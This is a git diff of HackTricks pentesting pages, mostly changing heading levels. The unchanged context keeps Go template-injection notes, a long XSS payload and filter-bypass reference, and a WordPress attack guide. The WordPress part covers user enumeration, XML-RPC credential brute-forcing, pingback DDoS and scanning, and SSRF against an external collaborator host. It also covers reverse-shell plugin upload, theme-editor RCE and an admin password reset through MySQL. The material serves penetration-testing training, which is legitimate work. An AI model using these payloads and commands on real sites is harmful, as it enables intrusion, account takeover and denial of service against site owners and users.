The documentation for both the html/template module can be found [here](https://golang.org/pkg/html/template/), and the documentation for the text/template module can be found [here](https://golang.org/pkg/text/template/), and yes, they do vary, a lot. For example, in **text/templat**e, you can **directly call any public function with the “call” value**, this however, is not the case with html/template.
@@ -926,40 +920,41 @@ func (p Person) Secret (test string) string {
}
```
-**More information**
+#### More information
* [https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html](https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html)
* [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/)
-#### More Exploits
+### More Exploits
Check the rest of [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) for more exploits. Also you can find interesting tags information in [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
-### BlackHat PDF
+## BlackHat PDF
{% file src="../../.gitbook/assets/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15.pdf" %}
-### Related Help
+## Related Help
If you think it could be useful, read:
* [Flask tricks](../../pentesting/pentesting-web/flask.md)
* [Python magic functions](../../misc/basic-python/magic-methods.md)
-### Tools
+## Tools
{% embed url="https://github.com/epinna/tplmap" %}
-### Brute-Force Detection List
+## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
-### Practice & References
+## Practice & References
* [https://portswigger.net/web-security/server-side-template-injection/exploiting](https://portswigger.net/web-security/server-side-template-injection/exploiting)
* [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
* [**https://portswigger.net/web-security/server-side-template-injection**](https://portswigger.net/web-security/server-side-template-injection)
+
Support HackTricks and get benefits!
@@ -975,3 +970,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md
index c280536b..f72c1565 100644
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@@ -1,4 +1,4 @@
-# XSS (Cross Site Scripting)
+
@@ -16,9 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## XSS (Cross Site Scripting)
-### Methodology
+# XSS (Cross Site Scripting)
+
+## Methodology
1. Check if **any value you control** (_parameters_, _path_, _headers_?, _cookies_?) is being **reflected** in the HTML or **used** by **JS** code.
2. **Find the context** where it's reflected/used.
@@ -49,7 +50,7 @@ When working on a complex XSS you might find interesting to know about:
[debugging-client-side-js.md](debugging-client-side-js.md)
{% endcontent-ref %}
-### Reflected values
+## Reflected values
In order to successfully exploit a XSS the first thing you need to find is a **value controlled by you that is being reflected** in the web page.
@@ -57,16 +58,16 @@ In order to successfully exploit a XSS the first thing you need to find is a **v
* **Stored and reflected**: If you find that a value controlled by you is saved in the server and is reflected every time you access a page you could exploit a **Stored XSS**.
* **Accessed via JS**: If you find that a value controlled by you is being access using JS you could exploit a **DOM XSS**.
-### Contexts
+## Contexts
When trying to exploit a XSS the first thing you need to know if **where is your input being reflected**. Depending on the context, you will be able to execute arbitrary JS code on different ways.
-#### Raw HTML
+### Raw HTML
If your input is **reflected on the raw HTML** page you will need to abuse some **HTML tag** in order to execute JS code: ` #x #Access http://site.com/?#x t
```
-**Style events**
+#### Style events
```python
XSS
@@ -243,12 +244,12 @@ If you **cannot escape from the tag**, you could create new attributes inside th
```
-#### Within the attribute
+### Within the attribute
Even if you **cannot escape from the attribute** (`"` is being encoded or deleted), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.\
Another interesting **example** is the attribute `href`, where you can use the `javascript:` protocol to execute arbitrary code: **`href="javascript:alert(1)"`**
-**Bypass inside event using HTML encoding/URL encode**
+#### **Bypass inside event using HTML encoding/URL encode**
The **HTML encoded characters** inside the value of HTML tags attributes are **decoded on runtime**. Therefore something like the following will be valid (the payload is in bold): `Go Back `
@@ -275,7 +276,7 @@ Note that **any kind of HTML encode is valid**:
Click
```
-**Bypass inside event using Unicode encode**
+#### Bypass inside event using Unicode encode
```javascript
//For some reason you can use unicode to encode "alert" but not "(1)"
@@ -283,7 +284,7 @@ Note that **any kind of HTML encode is valid**:
```
-#### Special Protocols Within the attribute
+### Special Protocols Within the attribute
There you can use the protocols **`javascript:`** or **`data:`** in some places to **execute arbitrary JS code**. Some will require user interaction on some won't.
@@ -307,7 +308,7 @@ data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
```
-**Places where you can inject these protocols**
+#### Places where you can inject these protocols
**In general** the `javascript:` protocol can be **used in any tag that accepts the attribute `href`** and in **most** of the tags that accepts the **attribute `src`** (but not `
```
-**Other obfuscation tricks**
+#### Other obfuscation tricks
_**In this case the HTML encoding and the Unicode encoding trick from the previous section is also valid as you are inside an attribute.**_
@@ -349,7 +350,7 @@ Moreover, there is another **nice trick** for these cases\*\*: Even if your inpu
Note that if you try to **use both** `URLencode + HTMLencode` in any order to encode the **payload** it **won't** **work**, but you can **mix them inside the payload**.
-**Using Hex and Octal encode with `javascript:`**
+#### Using Hex and Octal encode with `javascript:`
You can use **Hex** and **Octal encode** inside the `src` attribute of `iframe` (at least) to declare **HTML tags to execute JS**:
@@ -365,7 +366,7 @@ You can use **Hex** and **Octal encode** inside the `src` attribute of `iframe`
```
-#### Reverse tab nabbing
+### Reverse tab nabbing
```javascript
alert(1)">
```
-#### JavaScript bypass blacklists techniques
+### JavaScript bypass blacklists techniques
-**Strings**
+#### Strings
```javascript
"thisisastring"
@@ -500,14 +501,14 @@ atob("dGhpc2lzYXN0cmluZw==")
eval(8680439..toString(30))(983801..toString(36))
```
-**Space substitutions inside JS code**
+#### Space substitutions inside JS code
```javascript
/**/
```
-**JavaScript without parentheses**
+#### JavaScript without parentheses
```javascript
alert`1`
@@ -519,7 +520,7 @@ eval.apply`${[`alert\x2823\x29`]}`
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
-**JavaScript comments (from** [**JavaScript Comments**](./#javascript-comments) **trick)**
+#### JavaScript comments (from [JavaScript Comments](./#javascript-comments) trick)
```javascript
//This is a 1 line comment
@@ -528,7 +529,7 @@ eval.apply`${[`alert\x2823\x29`]}`
-->This is a 1 line comment, but "-->" must to be at the beggining of the line
```
-**JavaScript new lines (from** [**JavaScript new line**](./#javascript-new-lines) **trick)**
+#### JavaScript new lines (from [JavaScript new line](./#javascript-new-lines) trick)
```javascript
//Javascript interpret as new line these chars:
@@ -538,7 +539,7 @@ String.fromCharCode(8232) //0xe2 0x80 0xa8
String.fromCharCode(8233) //0xe2 0x80 0xa8
```
-**Arbitrary function (alert) call**
+#### Arbitrary function (alert) call
````javascript
//Eval like functions
@@ -599,7 +600,7 @@ top[8680439..toString(30)](1)
````
-### **DOM vulnerabilities**
+## **DOM vulnerabilities**
There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.\
**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**:**
@@ -611,19 +612,19 @@ There is **JS code** that is using **unsafely data controlled by an attacker** l
There you will find a detailed **explanation of what DOM vulnerabilities are, how are they provoked, and how to exploit them**.\
Also, don't forget that **at the end of the mentioned post** you can find an explanation about [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering).
-### Other Bypasses
+## Other Bypasses
-#### Normalised Unicode
+### Normalised Unicode
You could check is the **reflected values** are being **unicode normalized** in the server (or in the client side) and abuse this functionality to bypass protections. [**Find an example here**](../unicode-normalization-vulnerability.md#xss-cross-site-scripting).
-#### PHP FILTER\_VALIDATE\_EMAIL flag Bypass
+### PHP FILTER\_VALIDATE\_EMAIL flag Bypass
```javascript
">"@x.y
```
-#### Ruby-On-Rails bypass
+### Ruby-On-Rails bypass
Due to **RoR mass assignment** quotes are inserted in the HTML and then the quote restriction is bypassed and additoinal fields (onfocus) can be added inside the tag.\
Form example ([from this report](https://hackerone.com/reports/709336)), if you send the payload:
@@ -644,7 +645,7 @@ Then, the onfocus attribute will be inserted:
A XSS occurs.
-#### Special combinations
+### Special combinations
```markup
```
-### XSS resources
+## XSS resources
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)\
[http://www.xss-payloads.com](http://www.xss-payloads.com) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt) [https://github.com/materaj/xss-list](https://github.com/materaj/xss-list) [https://github.com/ismailtasdelen/xss-payload-list](https://github.com/ismailtasdelen/xss-payload-list) [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)\
[https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
-#### XSS TOOLS
+### XSS TOOLS
Find some [**tools for XSS here**](xss-tools.md)**.**
+
Support HackTricks and get benefits!
@@ -1095,3 +1097,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md
index c0772009..355da97a 100644
--- a/pentesting/pentesting-web/wordpress.md
+++ b/pentesting/pentesting-web/wordpress.md
@@ -1,4 +1,4 @@
-# Wordpress
+
@@ -16,9 +16,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Wordpress
-### Basic Information
+# Wordpress
+
+## Basic Information
**Uploaded** files go to: _http://10.10.10.10/wp-content/uploads/2018/08/a.txt_\
\_\_**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in\*\*:\*\* [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\
@@ -28,7 +29,7 @@ In **wp-config.php** you can find the root password of the database.
Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
-#### **Main WordPress Files**
+### **Main WordPress Files**
* `index.php`
* `license.txt` contains useful information such as the version WordPress installed.
@@ -43,11 +44,11 @@ Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admi
* `wp-content/uploads/` Is the directory where any files uploaded to the platform are stored.
* `wp-includes/` This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.
-**Post exploitation**
+#### Post exploitation
* The `wp-config.php` file contains information required by WordPress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.
-#### Users Permissions
+### Users Permissions
* **Administrator**
* **Editor**: Publish and manages his and others posts
@@ -55,9 +56,9 @@ Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admi
* **Contributor**: Write and manage his posts but cannot publish them
* **Subscriber**: Browser posts and edit their profile
-### **Passive Enumeration**
+## **Passive Enumeration**
-#### **Get WordPress version**
+### **Get WordPress version**
Check if you can find the files `/license.txt` or `/readme.html`
@@ -75,33 +76,33 @@ Inside the **source code** of the page (example from [https://wordpress.org/supp
![](<../../.gitbook/assets/image (346).png>)
-#### Get Plugins
+### Get Plugins
```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
-#### Get Themes
+### Get Themes
```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
-#### Extract versions in general
+### Extract versions in general
```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
-### Active enumeration
+## Active enumeration
-#### Plugins and Themes
+### Plugins and Themes
You probably won't be able to find all the Plugins and Themes passible. In order to discover all of them, you will need to **actively Brute Force a list of Plugins and Themes** (hopefully for us there are automated tools that contains this lists).
-#### Users
+### Users
-**ID Brute**
+#### ID Brute
You get valid users from a WordPress site by Brute Forcing users IDs:
@@ -111,7 +112,7 @@ curl -s -I -X GET http://blog.example.com/?author=1
If the responses are **200** or **30X**, that means that the id is **valid**. If the the response is **400**, then the id is **invalid**.
-**wp-json**
+#### wp-json
You can also try to get information about the users by querying:
@@ -123,13 +124,13 @@ curl http://blog.example.com/wp-json/wp/v2/users
Also note that _**/wp-json/wp/v2/pages** could leak IP addresses\*\*.\*\*_
-#### XML-RPC
+### XML-RPC
If `xml-rpc.php` is active you can perform a credentials brute-force or use it to launch DoS attacks to other resources. (You can automate this process[ using this](https://github.com/relarizky/wpxploit) for example).
To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
-**Check**
+#### Check
```markup
@@ -140,7 +141,7 @@ To see if it is active try to access to _**/xmlrpc.php**_ and send this request:
![](https://h3llwings.files.wordpress.com/2019/01/list-of-functions.png?w=656)
-**Credentials Bruteforce**
+#### Credentials Bruteforce
_**wp.getUserBlogs**_, \_**wp.getCategories** \_ or _**metaWeblog.getUsersBlogs**_ are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:
@@ -160,11 +161,11 @@ Also there is a **faster way** to brute-force credentials using **`system.multic
![](https://firebasestorage.googleapis.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L\_2uGJGU7AVNRcqRvEi%2Fuploads%2FFX0g2BLsdfdQnq1xXx3N%2Ffile.jpeg?alt=media)
-**Bypass 2FA**
+#### Bypass 2FA
This method is meant for programs and not for humans, and old, therefore it doesn't support 2FA. So, if you have valid creds but the main entrance is protected by 2FA, **you might be able to abuse xmlrpc.php to login with those creds bypassing 2FA**. Note that you won't me able to perform all the actions you can do through the console, but you might still be able to get to RCE as Ippsec explains it in [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s)
-**DDoS or port scanning**
+#### DDoS or port scanning
If you can find the method _**pingback.ping**_ inside the list you can make the Wordpress send an arbitrary request to any host/port.\
This can be used to ask **thousands** of Wordpress **sites** to **access** one **location** (so a **DDoS** is caused in that location) or you can use it to make **Wordpress** lo **scan** some internal **network** (you can indicate any port).
@@ -185,7 +186,7 @@ If you get **faultCode** with a value **greater** then **0** (17), it means the
Take a look to the use of \*\*`system.multicall`\*\*in the previous section to learn how to abuse this method to cause DDoS.
-#### wp-cron.php DoS
+### wp-cron.php DoS
This file usually exists under the root of the Wordpress site: `/wp-cron.php`\
When this file is **accessed** a "**heavy**" MySQL **query** is performed, so I could be used by **attackers** to **cause** a **DoS**.\
@@ -193,7 +194,7 @@ Also, by default, the `wp-cron.php` is called on every page load (anytime a clie
It is recommended to disable Wp-Cron and create a real cronjob inside the host that perform the needed actions in a regular interval (without causing issues).
-**Bruteforce**
+#### **Bruteforce**
```markup
@@ -205,7 +206,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
```
-![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1).png>)
+![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1).png>)
![](<../../.gitbook/assets/image (102).png>)
@@ -241,7 +242,7 @@ Using the correct credentials you can upload a file. In the response the path wi
```
-**DDOS**
+#### DDOS
```markup
@@ -255,7 +256,7 @@ Using the correct credentials you can upload a file. In the response the path wi
![](<../../.gitbook/assets/image (103).png>)
-#### /wp-json/oembed/1.0/proxy - SSRF
+### /wp-json/oembed/1.0/proxy - SSRF
Try to access _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ and the Worpress site may make a request to you.
@@ -263,13 +264,13 @@ This is the response when it doesn't work:
![](<../../.gitbook/assets/image (184).png>)
-#### SSRF
+### SSRF
{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}
This tool checks if the **methodName: pingback.ping** and for the path **/wp-json/oembed/1.0/proxy** and if exists, it tries to exploit them.
-#### Automatic Tools
+### Automatic Tools
```bash
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
@@ -277,9 +278,9 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
#You can try to bruteforce the admin user using wpscan with "-U admin"
```
-### **Panel RCE**
+## **Panel RCE**
-**Modifying a php from the theme used (admin credentials needed)**
+#### **Modifying a php from the theme used (admin credentials needed)**
Appearance → Editor → 404 Template (at the right)
@@ -289,7 +290,7 @@ Change the content for a php shell:
Search in internet how can you access that updated page. In thi case you have to access here: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
-#### MSF
+### MSF
You can use:
@@ -299,9 +300,9 @@ use exploit/unix/webapp/wp_admin_shell_upload
to get a session.
-### Plugin RCE
+## Plugin RCE
-#### PHP plugin
+### PHP plugin
It may be possible to upload .php files as a plugin.\
Create your php backdoor using for example:
@@ -328,9 +329,9 @@ Access it and you will see the URL to execute the reverse shell:
![](<../../.gitbook/assets/image (414).png>)
-#### Uploading and activating malicious plugin
+### Uploading and activating malicious plugin
-**(This part is copied from** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)**)**
+#### **(This part is copied from** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)**)**
Some time logon users do not own writable authorization to make modifications to the WordPress theme, so we choose “Inject WP pulgin malicious” as an alternative strategy to acquiring a web shell.
@@ -362,7 +363,7 @@ As the above commands are executed, you will have your meterpreter session. Just
![](https://i1.wp.com/1.bp.blogspot.com/-s6Yblqj-zQ8/XY9pz0qYWAI/AAAAAAAAguo/WXgEBKIB64Ian\_RQWaltbEtdzCNpexKOwCLcBGAsYHQ/s1600/14.png?w=687\&ssl=1)
-### Post Exploitation
+## Post Exploitation
Extract usernames and passwords:
@@ -376,9 +377,9 @@ Change admin password:
mysql -u --password= -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
```
-### WordPress Protection
+## WordPress Protection
-#### Regular Updates
+### Regular Updates
Make sure WordPress, plugins, and themes are up to date. Also confirm that automated updating is enabled in wp-config.php:
@@ -390,13 +391,13 @@ add_filter( 'auto_update_theme', '__return_true' );
Also, **only install trustable WordPress plugins and themes**.
-#### Security Plugins
+### Security Plugins
* [**Wordfence Security**](https://wordpress.org/plugins/wordfence/)
* [**Sucuri Security**](https://wordpress.org/plugins/sucuri-scanner/)
* [**iThemes Security**](https://wordpress.org/plugins/better-wp-security/)
-#### **Other Recommendations**
+### **Other Recommendations**
* Remove default **admin** user
* Use **strong passwords** and **2FA**
@@ -404,7 +405,8 @@ Also, **only install trustable WordPress plugins and themes**.
* **Limit login attempts** to prevent Brute Force attacks
* Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
-###
+##
+
@@ -421,3 +423,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+